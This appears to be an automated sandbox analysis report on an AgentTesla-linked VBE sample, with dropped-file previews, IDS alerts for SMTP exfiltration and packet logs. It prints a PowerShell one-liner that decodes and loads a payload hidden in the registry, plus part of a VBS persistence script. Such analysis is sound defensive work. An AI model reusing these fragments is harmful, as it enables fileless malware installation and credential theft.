                                  Malicious:false
                                  Reputation:low
                                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.2.4.4.<./.P.i.

                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WER9D77.tmp.xml

                                  Download File
                                  Process:C:\Windows\System32\wermgr.exe
                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):4899
                                  Entropy (8bit):4.565879470925075
                                  Encrypted:false
                                  SSDEEP:48:cvIwWl8zs0iJg771I93Z76rWpW8VY1Ym8M4JFKlnOtSFDyq8vT0OthytfJd:uIjf5I7yZ76a7V9JFKlntWT0kufJd
                                  MD5:1A677ABB825C146BBDDEA3B7FEB5D489
                                  SHA1:8666E11BC3B0522FE466EE1F139E36A33D5AAF2D
                                  SHA-256:09CF758B3BE4B1AC6C8271760187D2D51BA430E69A64417F3CE826282D55CECE
                                  SHA-512:92FB6AE9FF3AED57D714CDA031509F9D4783B119F3426A21BC7750D296C2747FEB1635859A1C2ED375F058CEDF024CBD992D60343ECB59F96CB4AA99A5F71DF4
                                  Malicious:false
                                  Reputation:low
                                  Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="676822" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                  C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                  Download File
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):11887
                                  Entropy (8bit):4.901437212034066
                                  Encrypted:false
                                  SSDEEP:192:Zxoe5qpOZxoe54ib4ZVsm5emdqVFn3eGOVpN6K3bkkjo5OgkjDt4iWN3yBGHVQ9L:Srib4ZmVoGIpN6KQkj2Fkjh4iUxsNYWd
                                  MD5:ED30A738A05A68D6AB27771BD846A7AA
                                  SHA1:6AFCE0F6E39A9A59FF54956E1461F09747B57B44
                                  SHA-256:17D48B622292E016CFDF0550340FF6ED54693521D4D457B88BB23BD1AE076A31
                                  SHA-512:183E9ECAF5C467D7DA83F44FE990569215AFDB40B79BCA5C0D2C021228C7B85DF4793E2952130B772EC0896FBFBCF452078878ADF3A380A6D0A6BD00EA6663F2
                                  Malicious:false
                                  Reputation:moderate, very likely benign file
                                  Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af

                                  C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

                                  Download File
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):3256
                                  Entropy (8bit):5.404109340363203
                                  Encrypted:false
                                  SSDEEP:96:gEzlHyIFKL2O9qrh7Kf+oRJ5Eo9AdrxwN:V1yt2jrAfRLL2G
                                  MD5:047B195D3B8C00130835658997B1925D
                                  SHA1:5F77C7A5F798C4C0253839EBD7554B13987704E3
                                  SHA-256:B2C2801565403B2348CAF820F20B4B92C8725A5079D5360DAF455E84D28AC1FB
                                  SHA-512:D1724BE394B214B914A236AC1D55DB17B93669880BB3F71057DCD070AF3062FBFF494ABE085345015FCDF5FE6B11BAE9A19FCD20DC4EB749E13F31CD5565D60D
                                  Malicious:false
                                  Preview:@...e...........................................................H..............@-....f.J.|.7h8..q.......Microsoft.Powershell.PSReadline.H...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.................0..~.J.R...L........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<................$@...J....M+.B........System.Transactions.8.................C}...C....n..Bi.......Microsoft.CSharpP...............

                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_00nftn2p.tvy.psm1

                                  Download File
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):60
                                  Entropy (8bit):4.038920595031593
                                  Encrypted:false
                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                  Malicious:false
                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mk50qoaj.oh4.ps1

                                  Download File
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):60
                                  Entropy (8bit):4.038920595031593
                                  Encrypted:false
                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                  Malicious:false
                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt

                                  Download File
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):252
                                  Entropy (8bit):5.4037343689320885
                                  Encrypted:false
                                  SSDEEP:6:xVwe5ljxsu2xKbLtSXqo83inrHXZuBiA2V0LY+SXFI59:772EtSXqdiTJci1V0LYtXo
                                  MD5:4EBB9486C86C05A7C6888B977EA15FA8
                                  SHA1:7C9421A3CAA33767F9DADD5A7369865B07978FC2
                                  SHA-256:599EF81EC13CE5139CE8C5B77A8D56E66C17C4F8193ECAE14976E4691DBD2373
                                  SHA-512:6C9423222490C42FEECE32BA38A1F92DA0CB5A0BC8882CB6919E41C9FA06FAE05DE5A1419E063E9794EAC57862E98F253723F546F9AA83FE7C7BF25DA6C7EF45
                                  Malicious:false
                                  Preview:[AppDomain]::CurrentDomain.Load([Convert]::FromBase64String((-join (Get-ItemProperty -LiteralPath 'HKCU:\Software\uaDoJtHubxengYS' -Name 's').s | ForEach-Object {$_[-1..-($_.Length)]}))); [b.b]::b('uaDoJtHubxengYS')..Stop-Process -Name conhost -Force..

                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\0SFF35UD0M82MZNFFLNE.temp

                                  Download File
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):6222
                                  Entropy (8bit):3.7098800246239754
                                  Encrypted:false
                                  SSDEEP:96:AL+XC6oRykvhkvCCtu2/X9u+Hd2/X99+H+:s+lQuu2/QU2/Dh
                                  MD5:3545863F759F8D4DC5497C03481DF1DA
                                  SHA1:6D05C0773B7EB520E8816300D14173F0E348608B
                                  SHA-256:7245AFBB18FF5552808C2CA7FC9F2F120968F24430EF705332CF4BA0E1548802
                                  SHA-512:2EE3D8FAD7498052D782A86EB5110B7350F30DE1892119B7C68A7F17C1D691E43CD08170E781763CC2BEE543D03D15DDA3A5C92C7CAF96138E518949DA2C20CB
                                  Malicious:false
                                  Preview:...................................FL..................F.".. ...d...........g..z.:{.............................:..DG..Yr?.D..U..k0.&...&...... M..........g...]...g......t...CFSF..1.....DWSl..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......DWSl/Z}J....B.....................Bdg.A.p.p.D.a.t.a...B.V.1...../Z.J..Roaming.@......DWSl/Z.J....C.....................o.a.R.o.a.m.i.n.g.....\.1.....DW.q..MICROS~1..D......DWSl/ZxJ....D.....................sy%.M.i.c.r.o.s.o.f.t.....V.1.....DW.r..Windows.@......DWSl/ZxJ....E.....................?}..W.i.n.d.o.w.s.......1.....DWUl..STARTM~1..n......DWSl/ZxJ....G...............D......a..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DWWn..Programs..j......DWSl/ZxJ....H...............@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......DWSlDWSl....I.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......DWSl/Z.J....q...........

                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)

                                  Download File
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):6222
                                  Entropy (8bit):3.7098800246239754
                                  Encrypted:false
                                  SSDEEP:96:AL+XC6oRykvhkvCCtu2/X9u+Hd2/X99+H+:s+lQuu2/QU2/Dh
                                  MD5:3545863F759F8D4DC5497C03481DF1DA
                                  SHA1:6D05C0773B7EB520E8816300D14173F0E348608B
                                  SHA-256:7245AFBB18FF5552808C2CA7FC9F2F120968F24430EF705332CF4BA0E1548802
                                  SHA-512:2EE3D8FAD7498052D782A86EB5110B7350F30DE1892119B7C68A7F17C1D691E43CD08170E781763CC2BEE543D03D15DDA3A5C92C7CAF96138E518949DA2C20CB
                                  Malicious:false
                                  Preview:...................................FL..................F.".. ...d...........g..z.:{.............................:..DG..Yr?.D..U..k0.&...&...... M..........g...]...g......t...CFSF..1.....DWSl..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......DWSl/Z}J....B.....................Bdg.A.p.p.D.a.t.a...B.V.1...../Z.J..Roaming.@......DWSl/Z.J....C.....................o.a.R.o.a.m.i.n.g.....\.1.....DW.q..MICROS~1..D......DWSl/ZxJ....D.....................sy%.M.i.c.r.o.s.o.f.t.....V.1.....DW.r..Windows.@......DWSl/ZxJ....E.....................?}..W.i.n.d.o.w.s.......1.....DWUl..STARTM~1..n......DWSl/ZxJ....G...............D......a..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DWWn..Programs..j......DWSl/ZxJ....H...............@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......DWSlDWSl....I.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......DWSl/Z.J....q...........

                                  C:\Users\user\AppData\Roaming\uaDoJtHubxengYS.vbs

                                  Download File
                                  Process:C:\Windows\System32\wscript.exe
                                  File Type:ASCII text
                                  Category:dropped
                                  Size (bytes):2915
                                  Entropy (8bit):5.027561445008011
                                  Encrypted:false
                                  SSDEEP:48:aJrvgJXVv0qD4p7pYazIZYANMaBoqpotJ8gfng++E/uTcb6OqaBXl8zmqgjHVVk3:UL4VvlDQeADaK8gPOOqav97Zma+cmaS3
                                  MD5:477E3B6CBF610F72373118D4CA9CDBB2
                                  SHA1:CA88C1B80FA6248644497449C294F92B5A32B300
                                  SHA-256:9D75154B064FC63A3DE686569088EF8C7AC31F2826DC4557D5E7074535BBDF3C
                                  SHA-512:AD3D81784CB1199839E66C7B88AC1DA0C14A7F8A6F3F9A7BBB496FC953F02253733E5F7370EFE5C08D9C5F4A9F037D84D814E958EA8715732D9E3DF14B94B119
                                  Malicious:true
                                  Preview:Option Explicit..' Nombre du projet: uaDoJtHubxengYS.' Variables globales.Dim ShellObjet, DossierWindows, CompteurIterations.Set ShellObjet = CreateObject("WScript.Shell").DossierWindows = ShellObjet.ExpandEnvironmentStrings("%windir%")..' Programme principal.Call Initialisation().Call ExecutionPrincipale()..' Initialisation des parametres du programme.Sub Initialisation(). CompteurIterations = 0.End Sub..' Routine principale pour gerer l'execution du programme.Sub ExecutionPrincipale(). Do While CompteurIterations < 10000 ' Limite d'iterations pour demonstration. Call VerifierEtDemarrerPowerShell(). WScript.Sleep 10000. CompteurIterations = CompteurIterations + 1. Loop.End Sub..' Procedure pour verifier et demarrer PowerShell si necessaire.Sub VerifierEtDemarrerPowerShell(). If Not ProcessEnCours(ShellObjet.RegRead("HKEY_CURRENT_USER\Software\uaDoJtHubxengYS\i")) Then. If ShellObjet.RegRead("HKEY_CURRENT_USER\Software\uaDoJtHubxengYS\in") = "1"

                                  \Device\ConDrv

                                  Download File
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:Non-ISO extended-ASCII text, with very long lines (875), with CRLF line terminators, with escape sequences
                                  Category:dropped
                                  Size (bytes):1457
                                  Entropy (8bit):4.4508014556500015
                                  Encrypted:false
                                  SSDEEP:24:ELh/vNa2V269+IzISjeKm3uSmcHSMxOAX4WLeX4WgeX4WgeX4WneX4WueX4WEeXP:EL+WxZzzyS+OAX+X5XpXKX/XFXoXQXDp
                                  MD5:65D28DAC5EEFA063E84B6DEA64710012
                                  SHA1:BA4786D60A050CB5BC7863576796A1363486042E
                                  SHA-256:1DD4D009604A92CE4D26AC74E98366153E8A7BF4EDF73AFE24F6CD45CF6EDE60
                                  SHA-512:8B22218A20825E7285193A38CB513F8DE505836E4196DDECAD9A13DAABD1E8A55ECBD4CD53A1BFE4E2CEDA18058173808A1E2C1E072F63C511110E86487DBC44
                                  Malicious:false
                                  Preview:.[91m> .[0m.[33m[.[37mAppDoma.[33m.[45m.[0m.[33m.[45m> .[0m.[33m[.[37mAppDomain.[33m]::.[97mCurrentDomain.[33m..[97mLoad.[33m([.[37mConvert.[33m]::.[97mFromBase64String.[33m((.[90m-join.[33m.[45m .[33m(.[93mGet-ItemProperty.[33m.[45m .[90m-LiteralPath.[33m.[45m .[36m'HKCU:\Software\uaDoJtHubxengYS'.[33m.[45m .[90m-Name.[33m.[45m .[36m's'.[33m)..[97ms.[33m.[45m .[33m|.[33m.[45m .[93mForEach-Object.[33m.[45m .[33m{.[92m$_.[33m[.[97m-1.[90m..-.[33m(.[92m$_.[33m..[97mLength.[33m)]})));.[33m.[45m .[33m[.[37mb.b.[33m]::.[97mb.[33m(.[36m'uaDoJtHubxengYS'.[33m).[0m.tape 1 ..etape 2...[93mStop-Process.[33m.[45m .[90m-Name.[33m.[45m .[33mconho.[33m.[45m.[0m.[93mStop-Process.[33m.[45m .[90m-Name.[33m.[45m .[33mconhos.[33m.[45m.[0m.[93mStop-Process.[33m.[45m .[90m-Name.[33m.[45m .[33mconhost.[33m.[45m.[0m.[93mStop-Process.[33m.[45m .[90m-Name.[33m.[45m .[33mconhost.[33m.[45m .[33m.[45m.[0m.[93mStop-Process.[33m.[45m .[90m-Name.[33m.[45m .[33mconhost.[33m.[45m .[90m-.[33m.[45m.[0m.[93mStop-Process.

                                  Static File Info

                                  General

                                  File type:data
                                  Entropy (8bit):3.96389475873218
                                  TrID:
                                  • Text - UTF-16 (LE) encoded (2002/1) 64.44%
                                  • MP3 audio (1001/1) 32.22%
                                  • Lumena CEL bitmap (63/63) 2.03%
                                  • Corel Photo Paint (41/41) 1.32%
                                  File name:0969686.vbe
                                  File size:12'232 bytes
                                  MD5:4565da69d82d3d17f33436b132261de7
                                  SHA1:5e124ae25d9ec64cc681546299e0fa2d4f4b50d4
                                  SHA256:e2604e06a1d397760f22a668b48821dc20f06a8c3a28d165b9c96569b0e88bbb
                                  SHA512:7390abe671d2ad1a430bfb69888cdcb7f6e9284cc9432338a5b1eddeb0624987b92a56009e50c283c46894256ca1ab43640cac3ecbf09bd4b69867cccb6f4329
                                  SSDEEP:192:YeHNd/sigyX/tr7b7RMAv0Evwfk5Pv4fX//CxHQ6V62nN4je5K:zHMiTFPXHvwfk5PvQiHQ6EGijT
                                  TLSH:34420D58DFDD11C0F3116B969BC99B929B1F9A205B0F46C20D6102C6372EE81FDA9F39
                                  File Content Preview:..#.@.~.^.y.h.c.A.A.A.=.=.v.,.'.x.{.P.j.....D.k.6.k.1.C.Y.b.W.U./.,./.z.d.D.....:.+.,.x.'.{.@.#.@.&.w.;.U.m.D.k.K.x.~.|.P.K.I.`.b.@.#.@.&.~.P.,.P.6.U.,.2.D...G.M.P.].+.k.;.s.+.~.g.+.X.Y.@.#.@.&.P.,.~.P.G.k.h.P.o.A.J.K.B.P.p.\...I.B.P.K.t.].F.@.#.@.&.P.,.P

                                  File Icon

                                  Icon Hash:68d69b8f86ab9a86

                                  Network Behavior

                                  Suricata IDS Alerts

                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                  2025-01-15T10:19:58.058747+01002030171ET MALWARE AgentTesla Exfil Via SMTP1192.168.2.549707162.254.34.31587TCP
                                  2025-01-15T10:19:58.058747+01002840032ETPRO MALWARE Win32/AgentTesla/OriginLogger Data Exfil via SMTP M21192.168.2.549707162.254.34.31587TCP
                                  2025-01-15T10:20:12.096752+01002855245ETPRO MALWARE Agent Tesla Exfil via SMTP1192.168.2.549707162.254.34.31587TCP
                                  2025-01-15T10:20:12.096752+01002855542ETPRO MALWARE Agent Tesla CnC Exfil Activity1192.168.2.549707162.254.34.31587TCP

                                  Network Port Distribution

                                  TCP Packets

                                  TimestampSource PortDest PortSource IPDest IP
                                  Jan 15, 2025 10:19:58.058747053 CET49675443192.168.2.523.1.237.91
                                  Jan 15, 2025 10:19:58.058795929 CET49674443192.168.2.523.1.237.91
                                  Jan 15, 2025 10:19:58.224956989 CET49673443192.168.2.523.1.237.91
                                  Jan 15, 2025 10:20:00.622574091 CET4970480192.168.2.5144.91.79.54
                                  Jan 15, 2025 10:20:00.627722979 CET8049704144.91.79.54192.168.2.5
                                  Jan 15, 2025 10:20:00.627805948 CET4970480192.168.2.5144.91.79.54
                                  Jan 15, 2025 10:20:00.628182888 CET4970480192.168.2.5144.91.79.54
                                  Jan 15, 2025 10:20:00.633028030 CET8049704144.91.79.54192.168.2.5
                                  Jan 15, 2025 10:20:01.281866074 CET8049704144.91.79.54192.168.2.5
                                  Jan 15, 2025 10:20:01.281893969 CET8049704144.91.79.54192.168.2.5
                                  Jan 15, 2025 10:20:01.281929016 CET8049704144.91.79.54192.168.2.5
                                  Jan 15, 2025 10:20:01.281938076 CET4970480192.168.2.5144.91.79.54
                                  Jan 15, 2025 10:20:01.281944036 CET8049704144.91.79.54192.168.2.5
                                  Jan 15, 2025 10:20:01.281959057 CET8049704144.91.79.54192.168.2.5
                                  Jan 15, 2025 10:20:01.281974077 CET8049704144.91.79.54192.168.2.5
                                  Jan 15, 2025 10:20:01.281984091 CET4970480192.168.2.5144.91.79.54
                                  Jan 15, 2025 10:20:01.281990051 CET8049704144.91.79.54192.168.2.5
                                  Jan 15, 2025 10:20:01.282007933 CET8049704144.91.79.54192.168.2.5
                                  Jan 15, 2025 10:20:01.282011986 CET4970480192.168.2.5144.91.79.54
                                  Jan 15, 2025 10:20:01.282021999 CET8049704144.91.79.54192.168.2.5
                                  Jan 15, 2025 10:20:01.282038927 CET8049704144.91.79.54192.168.2.5
                                  Jan 15, 2025 10:20:01.282043934 CET4970480192.168.2.5144.91.79.54
                                  Jan 15, 2025 10:20:01.282067060 CET4970480192.168.2.5144.91.79.54
                                  Jan 15, 2025 10:20:01.286901951 CET8049704144.91.79.54192.168.2.5
                                  Jan 15, 2025 10:20:01.286917925 CET8049704144.91.79.54192.168.2.5
                                  Jan 15, 2025 10:20:01.286936998 CET8049704144.91.79.54192.168.2.5
                                  Jan 15, 2025 10:20:01.286952019 CET8049704144.91.79.54192.168.2.5
                                  Jan 15, 2025 10:20:01.286971092 CET4970480192.168.2.5144.91.79.54
                                  Jan 15, 2025 10:20:01.286994934 CET4970480192.168.2.5144.91.79.54
                                  Jan 15, 2025 10:20:01.374613047 CET8049704144.91.79.54192.168.2.5
                                  Jan 15, 2025 10:20:01.374630928 CET8049704144.91.79.54192.168.2.5
                                  Jan 15, 2025 10:20:01.374648094 CET8049704144.91.79.54192.168.2.5
                                  Jan 15, 2025 10:20:01.374663115 CET8049704144.91.79.54192.168.2.5
                                  Jan 15, 2025 10:20:01.374794960 CET4970480192.168.2.5144.91.79.54
                                  Jan 15, 2025 10:20:01.374794960 CET4970480192.168.2.5144.91.79.54
                                  Jan 15, 2025 10:20:01.379422903 CET8049704144.91.79.54192.168.2.5
                                  Jan 15, 2025 10:20:01.379440069 CET8049704144.91.79.54192.168.2.5
                                  Jan 15, 2025 10:20:01.379455090 CET8049704144.91.79.54192.168.2.5
                                  Jan 15, 2025 10:20:01.379511118 CET4970480192.168.2.5144.91.79.54
                                  Jan 15, 2025 10:20:01.379549026 CET8049704144.91.79.54192.168.2.5
                                  Jan 15, 2025 10:20:01.379565001 CET8049704144.91.79.54192.168.2.5
                                  Jan 15, 2025 10:20:01.379591942 CET4970480192.168.2.5144.91.79.54
                                  Jan 15, 2025 10:20:01.384165049 CET8049704144.91.79.54192.168.2.5
                                  Jan 15, 2025 10:20:01.384181976 CET8049704144.91.79.54192.168.2.5
                                  Jan 15, 2025 10:20:01.384196997 CET8049704144.91.79.54192.168.2.5
                                  Jan 15, 2025 10:20:01.384216070 CET4970480192.168.2.5144.91.79.54
                                  Jan 15, 2025 10:20:01.384251118 CET4970480192.168.2.5144.91.79.54
                                  Jan 15, 2025 10:20:01.519419909 CET4970480192.168.2.5144.91.79.54
                                  Jan 15, 2025 10:20:01.525103092 CET8049704144.91.79.54192.168.2.5
                                  Jan 15, 2025 10:20:01.711056948 CET8049704144.91.79.54192.168.2.5
                                  Jan 15, 2025 10:20:01.714025974 CET4970480192.168.2.5144.91.79.54
                                  Jan 15, 2025 10:20:01.718961954 CET8049704144.91.79.54192.168.2.5
                                  Jan 15, 2025 10:20:01.904853106 CET8049704144.91.79.54192.168.2.5
                                  Jan 15, 2025 10:20:01.904891968 CET8049704144.91.79.54192.168.2.5
                                  Jan 15, 2025 10:20:01.905071974 CET8049704144.91.79.54192.168.2.5
                                  Jan 15, 2025 10:20:01.905072927 CET4970480192.168.2.5144.91.79.54
                                  Jan 15, 2025 10:20:01.905107975 CET8049704144.91.79.54192.168.2.5
                                  Jan 15, 2025 10:20:01.905143023 CET8049704144.91.79.54192.168.2.5
                                  Jan 15, 2025 10:20:01.905157089 CET4970480192.168.2.5144.91.79.54
                                  Jan 15, 2025 10:20:01.905175924 CET8049704144.91.79.54192.168.2.5
                                  Jan 15, 2025 10:20:01.905210972 CET8049704144.91.79.54192.168.2.5
                                  Jan 15, 2025 10:20:01.905220985 CET4970480192.168.2.5144.91.79.54
                                  Jan 15, 2025 10:20:01.905246019 CET8049704144.91.79.54192.168.2.5
                                  Jan 15, 2025 10:20:01.905287981 CET4970480192.168.2.5144.91.79.54
                                  Jan 15, 2025 10:20:01.905802965 CET8049704144.91.79.54192.168.2.5
                                  Jan 15, 2025 10:20:01.905838013 CET8049704144.91.79.54192.168.2.5
                                  Jan 15, 2025 10:20:01.905870914 CET8049704144.91.79.54192.168.2.5
                                  Jan 15, 2025 10:20:01.905879021 CET4970480192.168.2.5144.91.79.54
                                  Jan 15, 2025 10:20:01.905904055 CET8049704144.91.79.54192.168.2.5
                                  Jan 15, 2025 10:20:01.905937910 CET8049704144.91.79.54192.168.2.5
                                  Jan 15, 2025 10:20:01.905946016 CET4970480192.168.2.5144.91.79.54
                                  Jan 15, 2025 10:20:01.905972958 CET8049704144.91.79.54192.168.2.5
                                  Jan 15, 2025 10:20:01.906023979 CET4970480192.168.2.5144.91.79.54
                                  Jan 15, 2025 10:20:01.906646967 CET8049704144.91.79.54192.168.2.5
                                  Jan 15, 2025 10:20:01.906696081 CET8049704144.91.79.54192.168.2.5
                                  Jan 15, 2025 10:20:01.906728983 CET8049704144.91.79.54192.168.2.5
                                  Jan 15, 2025 10:20:01.906734943 CET4970480192.168.2.5144.91.79.54
                                  Jan 15, 2025 10:20:01.906761885 CET8049704144.91.79.54192.168.2.5
                                  Jan 15, 2025 10:20:01.906795025 CET8049704144.91.79.54192.168.2.5
                                  Jan 15, 2025 10:20:01.906804085 CET4970480192.168.2.5144.91.79.54
                                  Jan 15, 2025 10:20:01.906829119 CET8049704144.91.79.54192.168.2.5
                                  Jan 15, 2025 10:20:01.906874895 CET4970480192.168.2.5144.91.79.54
                                  Jan 15, 2025 10:20:01.907489061 CET8049704144.91.79.54192.168.2.5
                                  Jan 15, 2025 10:20:01.907521963 CET8049704144.91.79.54192.168.2.5
                                  Jan 15, 2025 10:20:01.907556057 CET8049704144.91.79.54192.168.2.5
                                  Jan 15, 2025 10:20:01.907566071 CET4970480192.168.2.5144.91.79.54
                                  Jan 15, 2025 10:20:01.907592058 CET8049704144.91.79.54192.168.2.5
                                  Jan 15, 2025 10:20:01.907624006 CET8049704144.91.79.54192.168.2.5
                                  Jan 15, 2025 10:20:01.907632113 CET4970480192.168.2.5144.91.79.54
                                  Jan 15, 2025 10:20:01.907658100 CET8049704144.91.79.54192.168.2.5
                                  Jan 15, 2025 10:20:01.907706976 CET4970480192.168.2.5144.91.79.54
                                  Jan 15, 2025 10:20:01.908400059 CET8049704144.91.79.54192.168.2.5
                                  Jan 15, 2025 10:20:01.908448935 CET8049704144.91.79.54192.168.2.5
                                  Jan 15, 2025 10:20:01.908482075 CET8049704144.91.79.54192.168.2.5
                                  Jan 15, 2025 10:20:01.908490896 CET4970480192.168.2.5144.91.79.54
                                  Jan 15, 2025 10:20:01.908514977 CET8049704144.91.79.54192.168.2.5
                                  Jan 15, 2025 10:20:01.908549070 CET8049704144.91.79.54192.168.2.5
                                  Jan 15, 2025 10:20:01.908551931 CET4970480192.168.2.5144.91.79.54
                                  Jan 15, 2025 10:20:01.908586979 CET8049704144.91.79.54192.168.2.5
                                  Jan 15, 2025 10:20:01.908637047 CET4970480192.168.2.5144.91.79.54
                                  Jan 15, 2025 10:20:01.909231901 CET8049704144.91.79.54192.168.2.5
                                  Jan 15, 2025 10:20:01.909261942 CET8049704144.91.79.54192.168.2.5
                                  Jan 15, 2025 10:20:01.909310102 CET4970480192.168.2.5144.91.79.54
